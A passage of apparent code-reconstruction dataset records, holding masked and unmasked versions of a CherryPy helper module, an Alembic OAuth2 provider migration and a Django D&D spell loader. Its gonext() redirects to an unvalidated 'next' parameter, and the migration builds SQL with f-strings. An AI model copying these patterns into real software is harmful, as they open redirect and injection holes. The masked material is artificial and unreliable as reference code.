\"\"\"\n v = getparamlist(name, stash=stash, params=params)\n if len(v) > 0:\n return v[0]\n return default\n\n\ndef getintparam(name, default=None, stash=None, params=None):\n \"\"\"Get a query parameter, in a nice standardised way, with some special\n handling for old and new values.\n\n The query parameter is always returned as a single integer item, or None if\n not supplied. If supplied multiple times, one of the values is returned.\n\n \"\"\"\n v = getparamlist(name, stash=stash, params=params)\n if len(v) > 0:\n return int(v[0])\n return default\n\n\ndef getparamlist(name, default=[], stash=None, params=None):\n \"\"\"Get a query parameter, in a nice standardised way, with some special\n handling for old and new values.\n\n Returns a list of values.\n\n \"\"\"\n if params is None:\n params = cherrypy.request.params\n v = params.get('new' + name, None)\n if v is None:\n v = params.get(name, None)\n if v is None:\n v = params.get('old' + name, None)\n if v is None:\n return default\n v = listify(v)\n if stash is not None:\n stash[str(name)] = v\n return v\n\n\ndef getorderparam(name):\n \"\"\"Get the sequence of numbers stored in a parameter.\n\n The parameter should contain the numbers separated by commas.\n If invalid entries are found, raises an HTTP 400 error.\n\n \"\"\"\n for num in cherrypy.request.params.get(name, '').split(','):\n if num.strip() == '':\n continue\n try:\n yield int(num)\n except ValueError:\n raise cherrypy.HTTPError(400)\n\n\ndef jsonresp(value):\n \"\"\"Return a json formatted value, and set appropriate headers.\n\n \"\"\"\n body = json.dumps(value),\n cherrypy.response.headers['Content-Type'] = 'application/json'\n return body\n\n\ndef slugify(value):\n import unicodedata\n value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore')\n value = unicode(re.sub('[^\\\\w\\\\s\\\\.-]', '_', value).strip().lower())\n return re.sub('[-\\\\s]+', '-', value)\n",
"step-4": "import cherrypy\nimport config\ntry:\n from simplejson import json\nexcept ImportError:\n import json\nimport routes\nimport urllib\nimport re\n\n\ndef redirect(url, status=None):\n \"\"\"Raise a redirect to the specified address.\n\n \"\"\"\n raise cherrypy.HTTPRedirect(url, status)\n\n\ndef require_method(*allowed_methods):\n allowed_methods = list(allowed_methods)\n if 'GET' in allowed_methods:\n if 'HEAD' not in allowed_methods:\n allowed_methods.append('HEAD')\n allowed_methods.sort()\n if cherrypy.request.method not in allowed_methods:\n cherrypy.response.headers['Allow'] = ', '.join(allowed_methods)\n raise cherrypy.HTTPError(405)\n\n\ndef gonext():\n \"\"\"Redirect to the url specified by the \"next\" parameter, if there is one.\n\n \"\"\"\n next = cherrypy.request.params.get('next', '')\n if next != '':\n redirect(next)\n\n\ndef url(*args, **kwargs):\n \"\"\"Get the url for a given route.\n\n \"\"\"\n if len(args) == 0 and len(kwargs) == 0:\n return cherrypy.url()\n newkwargs = dict((k, v[3:]) for k, v in kwargs.iteritems() if v is not\n None and k.startswith('old'))\n for k, v in kwargs.iteritems():\n if k.startswith('new') or k.startswith('old'):\n continue\n if v is None:\n try:\n del newkwargs[k]\n except KeyError:\n pass\n else:\n newkwargs[k] = v\n for k, v in kwargs.iteritems():\n if k[:3] != 'new':\n continue\n k = k[3:]\n if v is None:\n try:\n del newkwargs[k]\n except KeyError:\n pass\n else:\n newkwargs[k] = v\n if len(args) > 0 and args[0] == 'static':\n return config.STATIC_ASSETS_URL + '/'.join(args[1:])\n return cherrypy.url(routes.url_for(*args, **newkwargs))\n\n\ndef queryparams(*args, **kwargs):\n \"\"\"Encode a set of arguments as query parameters.\n\n \"\"\"\n args = dict(args)\n args.update(kwargs)\n return urllib.urlencode(args)\n\n\ndef get_or_404(cls, id):\n try:\n return cls.objects.get(unicode(id))\n except KeyError:\n raise cherrypy.NotFound\n\n\ndef locked(fn):\n \"\"\"Decorator to ensure that the mutex is locked while calling a method.\n\n The method's object must have a mutex in a property named \"mutex\".\n\n \"\"\"\n\n def locked_method(self, *args, **kwargs):\n self.mutex.acquire()\n try:\n return fn(self, *args, **kwargs)\n finally:\n self.mutex.release()\n return locked_method\n\n\ndef get_user():\n from apps.store.models import User\n try:\n user = User.objects.get(u'_')\n except KeyError:\n user = User(None)\n user.id = u'_'\n User.objects.set(user)\n return user\n\n\ndef get_settings():\n from apps.store.models import Settings\n try:\n settings = Settings.objects.get(u'_')\n except KeyError:\n settings = Settings(None)\n settings.id = u'_'\n settings.set_roots(config.default_media_roots)\n Settings.objects.set(settings)\n return settings\n\n\ndef listify(val):\n \"\"\"Convert a value, as found in cherrypy parameters, into a list.\n\n \"\"\"\n if isinstance(val, basestring):\n return [val]\n if hasattr(val, '__iter__'):\n return list(val)\n return [val]\n\n\ndef listify_values(params):\n \"\"\"Return a copy of a dict with values which were strings converted to\n lists.\n\n \"\"\"\n return dict((k, listify(v)) for k, v in params.iteritems())\n\n\ndef getparam(name, default=None, stash=None, params=None):\n \"\"\"Get a query parameter, in a nice standardised way, with some special\n handling for old and new values.\n\n The query parameter is always returned as a single item, or None if not\n supplied. If supplied multiple times, one of the values is returned.\n\n \"\"\"\n v = getparamlist(name, stash=stash, params=params)\n if len(v) > 0:\n return v[0]\n return default\n\n\ndef getintparam(name, default=None, stash=None, params=None):\n \"\"\"Get a query parameter, in a nice standardised way, with some special\n handling for old and new values.\n\n The query parameter is always returned as a single integer item, or None if\n not supplied. If supplied multiple times, one of the values is returned.\n\n \"\"\"\n v = getparamlist(name, stash=stash, params=params)\n if len(v) > 0:\n return int(v[0])\n return default\n\n\ndef getparamlist(name, default=[], stash=None, params=None):\n \"\"\"Get a query parameter, in a nice standardised way, with some special\n handling for old and new values.\n\n Returns a list of values.\n\n \"\"\"\n if params is None:\n params = cherrypy.request.params\n v = params.get('new' + name, None)\n if v is None:\n v = params.get(name, None)\n if v is None:\n v = params.get('old' + name, None)\n if v is None:\n return default\n v = listify(v)\n if stash is not None:\n stash[str(name)] = v\n return v\n\n\ndef getorderparam(name):\n \"\"\"Get the sequence of numbers stored in a parameter.\n\n The parameter should contain the numbers separated by commas.\n If invalid entries are found, raises an HTTP 400 error.\n\n \"\"\"\n for num in cherrypy.request.params.get(name, '').split(','):\n if num.strip() == '':\n continue\n try:\n yield int(num)\n except ValueError:\n raise cherrypy.HTTPError(400)\n\n\ndef jsonresp(value):\n \"\"\"Return a json formatted value, and set appropriate headers.\n\n \"\"\"\n body = json.dumps(value),\n cherrypy.response.headers['Content-Type'] = 'application/json'\n return body\n\n\ndef slugify(value):\n import unicodedata\n value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore')\n value = unicode(re.sub('[^\\\\w\\\\s\\\\.-]', '_', value).strip().lower())\n return re.sub('[-\\\\s]+', '-', value)\n",
"step-5": "import cherrypy\nimport config\ntry:\n from simplejson import json\nexcept ImportError:\n import json\nimport routes\nimport urllib\nimport re\n\ndef redirect(url, status=None):\n \"\"\"Raise a redirect to the specified address.\n\n \"\"\"\n raise cherrypy.HTTPRedirect(url, status)\n\ndef require_method(*allowed_methods):\n allowed_methods = list(allowed_methods)\n if \"GET\" in allowed_methods:\n if \"HEAD\" not in allowed_methods:\n allowed_methods.append(\"HEAD\")\n allowed_methods.sort()\n if cherrypy.request.method not in allowed_methods:\n cherrypy.response.headers['Allow'] = \", \".join(allowed_methods)\n raise cherrypy.HTTPError(405)\n\ndef gonext():\n \"\"\"Redirect to the url specified by the \"next\" parameter, if there is one.\n\n \"\"\"\n next = cherrypy.request.params.get('next', '')\n if next != '':\n redirect(next)\n\ndef url(*args, **kwargs):\n \"\"\"Get the url for a given route.\n\n \"\"\"\n if len(args) == 0 and len(kwargs) == 0:\n return cherrypy.url()\n # First read the old args\n newkwargs = dict(\n (k, v[3:]) for (k, v) in kwargs.iteritems()\n if v is not None and k.startswith('old')\n )\n # Apply neither new nor old args\n for (k, v) in kwargs.iteritems():\n if k.startswith('new') or k.startswith('old'):\n continue\n if v is None:\n try:\n del newkwargs[k]\n except KeyError: pass\n else:\n newkwargs[k] = v\n # Apply new args\n for (k, v) in kwargs.iteritems():\n if k[:3] != 'new':\n continue\n k = k[3:]\n if v is None:\n try:\n del newkwargs[k]\n except KeyError: pass\n else:\n newkwargs[k] = v\n if len(args) > 0 and args[0] == 'static':\n return config.STATIC_ASSETS_URL + '/'.join(args[1:])\n return cherrypy.url(routes.url_for(*args, **newkwargs))\n\ndef queryparams(*args, **kwargs):\n \"\"\"Encode a set of arguments as query parameters.\n\n \"\"\"\n args = dict(args)\n args.update(kwargs)\n return urllib.urlencode(args)\n\ndef get_or_404(cls, id):\n try:\n return cls.objects.get(unicode(id))\n except KeyError:\n raise cherrypy.NotFound\n\ndef locked(fn):\n \"\"\"Decorator to ensure that the mutex is locked while calling a method.\n\n The method's object must have a mutex in a property named \"mutex\".\n\n \"\"\"\n def locked_method(self, *args, **kwargs):\n self.mutex.acquire()\n try:\n return fn(self, *args, **kwargs)\n finally:\n self.mutex.release()\n return locked_method\n\ndef get_user():\n from apps.store.models import User\n try:\n user = User.objects.get(u'_')\n except KeyError:\n user = User(None)\n user.id = u'_'\n User.objects.set(user)\n return user\n\ndef get_settings():\n from apps.store.models import Settings\n try:\n settings = Settings.objects.get(u'_')\n except KeyError:\n settings = Settings(None)\n settings.id = u'_'\n settings.set_roots(config.default_media_roots)\n Settings.objects.set(settings)\n return settings\n\ndef listify(val):\n \"\"\"Convert a value, as found in cherrypy parameters, into a list.\n\n \"\"\"\n if isinstance(val, basestring):\n return [val]\n if hasattr(val, '__iter__'):\n return list(val)\n return [val]\n\ndef listify_values(params):\n \"\"\"Return a copy of a dict with values which were strings converted to\n lists.\n\n \"\"\"\n return dict((k, listify(v)) for (k, v) in params.iteritems())\n\ndef getparam(name, default=None, stash=None, params=None):\n \"\"\"Get a query parameter, in a nice standardised way, with some special\n handling for old and new values.\n\n The query parameter is always returned as a single item, or None if not\n supplied. If supplied multiple times, one of the values is returned.\n\n \"\"\"\n v = getparamlist(name, stash=stash, params=params)\n if len(v) > 0: return v[0]\n return default\n\ndef getintparam(name, default=None, stash=None, params=None):\n \"\"\"Get a query parameter, in a nice standardised way, with some special\n handling for old and new values.\n\n The query parameter is always returned as a single integer item, or None if\n not supplied. If supplied multiple times, one of the values is returned.\n\n \"\"\"\n v = getparamlist(name, stash=stash, params=params)\n if len(v) > 0: return int(v[0])\n return default\n\ndef getparamlist(name, default=[], stash=None, params=None):\n \"\"\"Get a query parameter, in a nice standardised way, with some special\n handling for old and new values.\n\n Returns a list of values.\n\n \"\"\"\n if params is None:\n params = cherrypy.request.params\n v = params.get(\"new\" + name, None)\n if v is None:\n v = params.get(name, None)\n if v is None:\n v = params.get(\"old\" + name, None)\n\n if v is None:\n return default\n\n v = listify(v)\n if stash is not None:\n stash[str(name)] = v\n return v\n\ndef getorderparam(name):\n \"\"\"Get the sequence of numbers stored in a parameter.\n\n The parameter should contain the numbers separated by commas.\n If invalid entries are found, raises an HTTP 400 error.\n\n \"\"\"\n for num in cherrypy.request.params.get(name, '').split(','):\n if num.strip() == '':\n continue\n try:\n yield int(num)\n except ValueError:\n raise cherrypy.HTTPError(400)\n\ndef jsonresp(value):\n \"\"\"Return a json formatted value, and set appropriate headers.\n\n \"\"\"\n body = (json.dumps(value),)\n cherrypy.response.headers['Content-Type'] = 'application/json'\n return body\n\ndef slugify(value):\n import unicodedata\n value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore')\n value = unicode(re.sub('[^\\w\\s\\.-]', '_', value).strip().lower())\n return re.sub('[-\\s]+', '-', value)\n",
"step-ids": [
11,
13,
16,
19,
20
]
}
|
[
11,
13,
16,
19,
20
] |
<|reserved_special_token_0|>
def upgrade():
bind = op.get_bind()
urls = bind.execute(
'SELECT p.id as pid, r.id as rid, r.uri as uri FROM oauth2_identity_provider p JOIN resource r ON p.api_resource_id = r.id'
)
op.add_column('oauth2_identity_provider', sa.Column('uri', sa.String(),
nullable=True))
for url in urls:
bind.execute(
f"UPDATE oauth2_identity_provider SET uri = '{url[2]}' WHERE id = {url[0]}"
)
bind.execute(
"UPDATE oauth2_identity_provider SET uri = 'https://github.com' WHERE name = 'github'"
)
op.alter_column('oauth2_identity_provider', 'uri', nullable=False)
op.create_unique_constraint(None, 'oauth2_identity_provider', ['uri'])
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def upgrade():
bind = op.get_bind()
urls = bind.execute(
'SELECT p.id as pid, r.id as rid, r.uri as uri FROM oauth2_identity_provider p JOIN resource r ON p.api_resource_id = r.id'
)
op.add_column('oauth2_identity_provider', sa.Column('uri', sa.String(),
nullable=True))
for url in urls:
bind.execute(
f"UPDATE oauth2_identity_provider SET uri = '{url[2]}' WHERE id = {url[0]}"
)
bind.execute(
"UPDATE oauth2_identity_provider SET uri = 'https://github.com' WHERE name = 'github'"
)
op.alter_column('oauth2_identity_provider', 'uri', nullable=False)
op.create_unique_constraint(None, 'oauth2_identity_provider', ['uri'])
def downgrade():
op.drop_constraint(None, 'oauth2_identity_provider', type_='unique')
op.drop_column('oauth2_identity_provider', 'uri')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
revision = '52561c782d96'
down_revision = 'cdf9f34b764c'
branch_labels = None
depends_on = None
def upgrade():
bind = op.get_bind()
urls = bind.execute(
'SELECT p.id as pid, r.id as rid, r.uri as uri FROM oauth2_identity_provider p JOIN resource r ON p.api_resource_id = r.id'
)
op.add_column('oauth2_identity_provider', sa.Column('uri', sa.String(),
nullable=True))
for url in urls:
bind.execute(
f"UPDATE oauth2_identity_provider SET uri = '{url[2]}' WHERE id = {url[0]}"
)
bind.execute(
"UPDATE oauth2_identity_provider SET uri = 'https://github.com' WHERE name = 'github'"
)
op.alter_column('oauth2_identity_provider', 'uri', nullable=False)
op.create_unique_constraint(None, 'oauth2_identity_provider', ['uri'])
def downgrade():
op.drop_constraint(None, 'oauth2_identity_provider', type_='unique')
op.drop_column('oauth2_identity_provider', 'uri')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from alembic import op
import sqlalchemy as sa
revision = '52561c782d96'
down_revision = 'cdf9f34b764c'
branch_labels = None
depends_on = None
def upgrade():
bind = op.get_bind()
urls = bind.execute(
'SELECT p.id as pid, r.id as rid, r.uri as uri FROM oauth2_identity_provider p JOIN resource r ON p.api_resource_id = r.id'
)
op.add_column('oauth2_identity_provider', sa.Column('uri', sa.String(),
nullable=True))
for url in urls:
bind.execute(
f"UPDATE oauth2_identity_provider SET uri = '{url[2]}' WHERE id = {url[0]}"
)
bind.execute(
"UPDATE oauth2_identity_provider SET uri = 'https://github.com' WHERE name = 'github'"
)
op.alter_column('oauth2_identity_provider', 'uri', nullable=False)
op.create_unique_constraint(None, 'oauth2_identity_provider', ['uri'])
def downgrade():
op.drop_constraint(None, 'oauth2_identity_provider', type_='unique')
op.drop_column('oauth2_identity_provider', 'uri')
<|reserved_special_token_1|>
"""Add uri on identity provider
Revision ID: 52561c782d96
Revises: cdf9f34b764c
Create Date: 2022-03-11 10:16:39.583434
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '52561c782d96'
down_revision = 'cdf9f34b764c'
branch_labels = None
depends_on = None
def upgrade():
bind = op.get_bind()
# get api urls
urls = bind.execute("SELECT p.id as pid, r.id as rid, r.uri as uri "
"FROM oauth2_identity_provider p JOIN resource r ON p.api_resource_id = r.id")
# add URI
op.add_column('oauth2_identity_provider', sa.Column('uri', sa.String(), nullable=True))
# set api_url as default URI
for url in urls:
bind.execute(f"UPDATE oauth2_identity_provider SET uri = '{url[2]}' WHERE id = {url[0]}")
# patch Github URI
bind.execute("UPDATE oauth2_identity_provider SET uri = 'https://github.com' WHERE name = 'github'")
# add constraints
op.alter_column('oauth2_identity_provider', 'uri', nullable=False)
op.create_unique_constraint(None, 'oauth2_identity_provider', ['uri'])
def downgrade():
# remove URI
op.drop_constraint(None, 'oauth2_identity_provider', type_='unique')
op.drop_column('oauth2_identity_provider', 'uri')
|
flexible
|
{
"blob_id": "c185a88332e39c561649f087f01fd3b704e7010b",
"index": 1959,
"step-1": "<mask token>\n\n\ndef upgrade():\n bind = op.get_bind()\n urls = bind.execute(\n 'SELECT p.id as pid, r.id as rid, r.uri as uri FROM oauth2_identity_provider p JOIN resource r ON p.api_resource_id = r.id'\n )\n op.add_column('oauth2_identity_provider', sa.Column('uri', sa.String(),\n nullable=True))\n for url in urls:\n bind.execute(\n f\"UPDATE oauth2_identity_provider SET uri = '{url[2]}' WHERE id = {url[0]}\"\n )\n bind.execute(\n \"UPDATE oauth2_identity_provider SET uri = 'https://github.com' WHERE name = 'github'\"\n )\n op.alter_column('oauth2_identity_provider', 'uri', nullable=False)\n op.create_unique_constraint(None, 'oauth2_identity_provider', ['uri'])\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef upgrade():\n bind = op.get_bind()\n urls = bind.execute(\n 'SELECT p.id as pid, r.id as rid, r.uri as uri FROM oauth2_identity_provider p JOIN resource r ON p.api_resource_id = r.id'\n )\n op.add_column('oauth2_identity_provider', sa.Column('uri', sa.String(),\n nullable=True))\n for url in urls:\n bind.execute(\n f\"UPDATE oauth2_identity_provider SET uri = '{url[2]}' WHERE id = {url[0]}\"\n )\n bind.execute(\n \"UPDATE oauth2_identity_provider SET uri = 'https://github.com' WHERE name = 'github'\"\n )\n op.alter_column('oauth2_identity_provider', 'uri', nullable=False)\n op.create_unique_constraint(None, 'oauth2_identity_provider', ['uri'])\n\n\ndef downgrade():\n op.drop_constraint(None, 'oauth2_identity_provider', type_='unique')\n op.drop_column('oauth2_identity_provider', 'uri')\n",
"step-3": "<mask token>\nrevision = '52561c782d96'\ndown_revision = 'cdf9f34b764c'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n bind = op.get_bind()\n urls = bind.execute(\n 'SELECT p.id as pid, r.id as rid, r.uri as uri FROM oauth2_identity_provider p JOIN resource r ON p.api_resource_id = r.id'\n )\n op.add_column('oauth2_identity_provider', sa.Column('uri', sa.String(),\n nullable=True))\n for url in urls:\n bind.execute(\n f\"UPDATE oauth2_identity_provider SET uri = '{url[2]}' WHERE id = {url[0]}\"\n )\n bind.execute(\n \"UPDATE oauth2_identity_provider SET uri = 'https://github.com' WHERE name = 'github'\"\n )\n op.alter_column('oauth2_identity_provider', 'uri', nullable=False)\n op.create_unique_constraint(None, 'oauth2_identity_provider', ['uri'])\n\n\ndef downgrade():\n op.drop_constraint(None, 'oauth2_identity_provider', type_='unique')\n op.drop_column('oauth2_identity_provider', 'uri')\n",
"step-4": "<mask token>\nfrom alembic import op\nimport sqlalchemy as sa\nrevision = '52561c782d96'\ndown_revision = 'cdf9f34b764c'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n bind = op.get_bind()\n urls = bind.execute(\n 'SELECT p.id as pid, r.id as rid, r.uri as uri FROM oauth2_identity_provider p JOIN resource r ON p.api_resource_id = r.id'\n )\n op.add_column('oauth2_identity_provider', sa.Column('uri', sa.String(),\n nullable=True))\n for url in urls:\n bind.execute(\n f\"UPDATE oauth2_identity_provider SET uri = '{url[2]}' WHERE id = {url[0]}\"\n )\n bind.execute(\n \"UPDATE oauth2_identity_provider SET uri = 'https://github.com' WHERE name = 'github'\"\n )\n op.alter_column('oauth2_identity_provider', 'uri', nullable=False)\n op.create_unique_constraint(None, 'oauth2_identity_provider', ['uri'])\n\n\ndef downgrade():\n op.drop_constraint(None, 'oauth2_identity_provider', type_='unique')\n op.drop_column('oauth2_identity_provider', 'uri')\n",
"step-5": "\"\"\"Add uri on identity provider\n\nRevision ID: 52561c782d96\nRevises: cdf9f34b764c\nCreate Date: 2022-03-11 10:16:39.583434\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '52561c782d96'\ndown_revision = 'cdf9f34b764c'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n bind = op.get_bind()\n # get api urls\n urls = bind.execute(\"SELECT p.id as pid, r.id as rid, r.uri as uri \"\n \"FROM oauth2_identity_provider p JOIN resource r ON p.api_resource_id = r.id\")\n # add URI\n op.add_column('oauth2_identity_provider', sa.Column('uri', sa.String(), nullable=True))\n # set api_url as default URI\n for url in urls:\n bind.execute(f\"UPDATE oauth2_identity_provider SET uri = '{url[2]}' WHERE id = {url[0]}\")\n # patch Github URI\n bind.execute(\"UPDATE oauth2_identity_provider SET uri = 'https://github.com' WHERE name = 'github'\")\n # add constraints\n op.alter_column('oauth2_identity_provider', 'uri', nullable=False)\n op.create_unique_constraint(None, 'oauth2_identity_provider', ['uri'])\n\n\ndef downgrade():\n # remove URI\n op.drop_constraint(None, 'oauth2_identity_provider', type_='unique')\n op.drop_column('oauth2_identity_provider', 'uri')\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# python imports
import re
# django imports
from django.core.management.base import BaseCommand
# module level imports
from utils.spells import SPELLS
from spells.models import Spell
SPELL_SCHOOL = {
'Abjuration': 'Abjuration',
'Conjuration': 'Conjuration',
'Divination': 'Divination',
'Enchantment': 'Enchantment',
'Evocation': 'Evocation',
'Illusion': 'Illusion',
'Necromancy': 'Necromancy',
'Transmutation': 'Transmutation',
}
CAST_TIME = {
'1 Action': '1 Action',
'1 Bonus Action': '1 Bonus Action',
'1 Reaction': '1 Reaction',
'1 Minute': '1 Minute',
'10 Minutes': '10 Minutes',
'1 Hour': '1 Hour',
'8 Hours': '8 Hours',
'12 Hours': '12 Hours',
'24 Hours': '24 Hours',
'1 Action or 8 Hours': '1 Action or 8 Hours',
}
SPELL_LEVELS = {
'Cantrip': 'Cantrip',
'1': '1st-level',
'2': '2nd-level',
'3': '3rd-level',
'4': '4th-level',
'5': '5th-level',
'6': '6th-level',
'7': '7th-level',
'8': '8th-level',
'9': '9th-level',
}
class Command(BaseCommand):
"""Command to populate the database with all spells for 5th Edition."""
# args
help = 'Will auto populate the database with all the Spells from 5th Edition Dungeons and Dragons.'
def handle(self, *args, **kwargs):
for spell in SPELLS:
spell_entry = Spell.objects.create(
name=spell['name'],
distance=spell['range'],
ritual=spell['ritual'],
)
if len(spell['classes']) > 1:
spell_entry.available_to = ''
for i in range(len(spell['classes'])):
spell_entry.available_to += spell['classes'][i].title() + ', '
else:
spell_entry.available_to = spell['classes'][0].title()
if 'components' in spell.keys():
spell_entry.somatic = spell['components']['somatic']
spell_entry.verbal = spell['components']['verbal']
spell_entry.material = spell['components']['material']
if spell_entry.material:
spell_entry.specific_materials = ''
for i in range(len(spell['components']['materials_needed'])):
spell_entry.specific_materials += spell['components']['materials_needed'][i] + ', '
if 'description' in spell.keys():
spell_entry.description = spell['description']
dice_number = re.findall(r'\d+(?=d)', spell['description'])
if len(dice_number) > 0:
spell_entry.damage_dice_number = dice_number[0]
dice_size = re.findall(r'(?<=d)\d+', spell['description'])
if len(dice_size) > 0:
spell_entry.damage_dice_size = dice_size[0]
s_throw = re.findall(r"[A-Z]\w+(?= saving throw)", spell['description'])
if len(s_throw) == 1:
s_throw = s_throw[0][:3].upper()
spell_entry.save_type = s_throw
if spell['level'] == 'cantrip':
spell_entry.level = 'Cantrip'
else:
spell_entry.level = SPELL_LEVELS[spell['level']]
if 'higher_levels' in spell.keys():
spell_entry.higher_level = spell['higher_levels']
if 'school' in spell.keys():
spell_entry.school = SPELL_SCHOOL[spell['school'].title()]
if 'casting_time' in spell.keys():
if 'reaction' in spell['casting_time']:
spell_entry.cast_time = CAST_TIME['1 Reaction']
else:
spell_entry.cast_time = spell['casting_time'].title()
if 'Concentration' in spell['duration']:
spell_entry.concentration = True
spell_entry.duration = spell['duration'][15:].title()
else:
spell_entry.concentration = False
spell_entry.duration = spell['duration']
spell_entry.save()
|
normal
|
{
"blob_id": "010f78d952657b3d7c11fbf8e46912d0294f6cc1",
"index": 9103,
"step-1": "<mask token>\n\n\nclass Command(BaseCommand):\n <mask token>\n help = (\n 'Will auto populate the database with all the Spells from 5th Edition Dungeons and Dragons.'\n )\n\n def handle(self, *args, **kwargs):\n for spell in SPELLS:\n spell_entry = Spell.objects.create(name=spell['name'], distance\n =spell['range'], ritual=spell['ritual'])\n if len(spell['classes']) > 1:\n spell_entry.available_to = ''\n for i in range(len(spell['classes'])):\n spell_entry.available_to += spell['classes'][i].title(\n ) + ', '\n else:\n spell_entry.available_to = spell['classes'][0].title()\n if 'components' in spell.keys():\n spell_entry.somatic = spell['components']['somatic']\n spell_entry.verbal = spell['components']['verbal']\n spell_entry.material = spell['components']['material']\n if spell_entry.material:\n spell_entry.specific_materials = ''\n for i in range(len(spell['components']['materials_needed'])\n ):\n spell_entry.specific_materials += spell['components'][\n 'materials_needed'][i] + ', '\n if 'description' in spell.keys():\n spell_entry.description = spell['description']\n dice_number = re.findall('\\\\d+(?=d)', spell['description'])\n if len(dice_number) > 0:\n spell_entry.damage_dice_number = dice_number[0]\n dice_size = re.findall('(?<=d)\\\\d+', spell['description'])\n if len(dice_size) > 0:\n spell_entry.damage_dice_size = dice_size[0]\n s_throw = re.findall('[A-Z]\\\\w+(?= saving throw)', spell[\n 'description'])\n if len(s_throw) == 1:\n s_throw = s_throw[0][:3].upper()\n spell_entry.save_type = s_throw\n if spell['level'] == 'cantrip':\n spell_entry.level = 'Cantrip'\n else:\n spell_entry.level = SPELL_LEVELS[spell['level']]\n if 'higher_levels' in spell.keys():\n spell_entry.higher_level = spell['higher_levels']\n if 'school' in spell.keys():\n spell_entry.school = SPELL_SCHOOL[spell['school'].title()]\n if 'casting_time' in spell.keys():\n if 'reaction' in spell['casting_time']:\n spell_entry.cast_time = CAST_TIME['1 Reaction']\n else:\n spell_entry.cast_time = spell['casting_time'].title()\n if 'Concentration' in spell['duration']:\n spell_entry.concentration = True\n spell_entry.duration = spell['duration'][15:].title()\n else:\n spell_entry.concentration = False\n spell_entry.duration = spell['duration']\n spell_entry.save()\n",
"step-2": "<mask token>\n\n\nclass Command(BaseCommand):\n \"\"\"Command to populate the database with all spells for 5th Edition.\"\"\"\n help = (\n 'Will auto populate the database with all the Spells from 5th Edition Dungeons and Dragons.'\n )\n\n def handle(self, *args, **kwargs):\n for spell in SPELLS:\n spell_entry = Spell.objects.create(name=spell['name'], distance\n =spell['range'], ritual=spell['ritual'])\n if len(spell['classes']) > 1:\n spell_entry.available_to = ''\n for i in range(len(spell['classes'])):\n spell_entry.available_to += spell['classes'][i].title(\n ) + ', '\n else:\n spell_entry.available_to = spell['classes'][0].title()\n if 'components' in spell.keys():\n spell_entry.somatic = spell['components']['somatic']\n spell_entry.verbal = spell['components']['verbal']\n spell_entry.material = spell['components']['material']\n if spell_entry.material:\n spell_entry.specific_materials = ''\n for i in range(len(spell['components']['materials_needed'])\n ):\n spell_entry.specific_materials += spell['components'][\n 'materials_needed'][i] + ', '\n if 'description' in spell.keys():\n spell_entry.description = spell['description']\n dice_number = re.findall('\\\\d+(?=d)', spell['description'])\n if len(dice_number) > 0:\n spell_entry.damage_dice_number = dice_number[0]\n dice_size = re.findall('(?<=d)\\\\d+', spell['description'])\n if len(dice_size) > 0:\n spell_entry.damage_dice_size = dice_size[0]\n s_throw = re.findall('[A-Z]\\\\w+(?= saving throw)', spell[\n 'description'])\n if len(s_throw) == 1:\n s_throw = s_throw[0][:3].upper()\n spell_entry.save_type = s_throw\n if spell['level'] == 'cantrip':\n spell_entry.level = 'Cantrip'\n else:\n spell_entry.level = SPELL_LEVELS[spell['level']]\n if 'higher_levels' in spell.keys():\n spell_entry.higher_level = spell['higher_levels']\n if 'school' in spell.keys():\n spell_entry.school = SPELL_SCHOOL[spell['school'].title()]\n if 'casting_time' in spell.keys():\n if 'reaction' in spell['casting_time']:\n spell_entry.cast_time = CAST_TIME['1 Reaction']\n else:\n spell_entry.cast_time = spell['casting_time'].title()\n if 'Concentration' in spell['duration']:\n spell_entry.concentration = True\n spell_entry.duration = spell['duration'][15:].title()\n else:\n spell_entry.concentration = False\n spell_entry.duration = spell['duration']\n spell_entry.save()\n",
"step-3": "<mask token>\nSPELL_SCHOOL = {'Abjuration': 'Abjuration', 'Conjuration': 'Conjuration',\n 'Divination': 'Divination', 'Enchantment': 'Enchantment', 'Evocation':\n 'Evocation', 'Illusion': 'Illusion', 'Necromancy': 'Necromancy',\n 'Transmutation': 'Transmutation'}\nCAST_TIME = {'1 Action': '1 Action', '1 Bonus Action': '1 Bonus Action',\n '1 Reaction': '1 Reaction', '1 Minute': '1 Minute', '10 Minutes':\n '10 Minutes', '1 Hour': '1 Hour', '8 Hours': '8 Hours', '12 Hours':\n '12 Hours', '24 Hours': '24 Hours', '1 Action or 8 Hours':\n '1 Action or 8 Hours'}\nSPELL_LEVELS = {'Cantrip': 'Cantrip', '1': '1st-level', '2': '2nd-level',\n '3': '3rd-level', '4': '4th-level', '5': '5th-level', '6': '6th-level',\n '7': '7th-level', '8': '8th-level', '9': '9th-level'}\n\n\nclass Command(BaseCommand):\n \"\"\"Command to populate the database with all spells for 5th Edition.\"\"\"\n help = (\n 'Will auto populate the database with all the Spells from 5th Edition Dungeons and Dragons.'\n )\n\n def handle(self, *args, **kwargs):\n for spell in SPELLS:\n spell_entry = Spell.objects.create(name=spell['name'], distance\n =spell['range'], ritual=spell['ritual'])\n if len(spell['classes']) > 1:\n spell_entry.available_to = ''\n for i in range(len(spell['classes'])):\n spell_entry.available_to += spell['classes'][i].title(\n ) + ', '\n else:\n spell_entry.available_to = spell['classes'][0].title()\n if 'components' in spell.keys():\n spell_entry.somatic = spell['components']['somatic']\n spell_entry.verbal = spell['components']['verbal']\n spell_entry.material = spell['components']['material']\n if spell_entry.material:\n spell_entry.specific_materials = ''\n for i in range(len(spell['components']['materials_needed'])\n ):\n spell_entry.specific_materials += spell['components'][\n 'materials_needed'][i] + ', '\n if 'description' in spell.keys():\n spell_entry.description = spell['description']\n dice_number = re.findall('\\\\d+(?=d)', spell['description'])\n if len(dice_number) > 0:\n spell_entry.damage_dice_number = dice_number[0]\n dice_size = re.findall('(?<=d)\\\\d+', 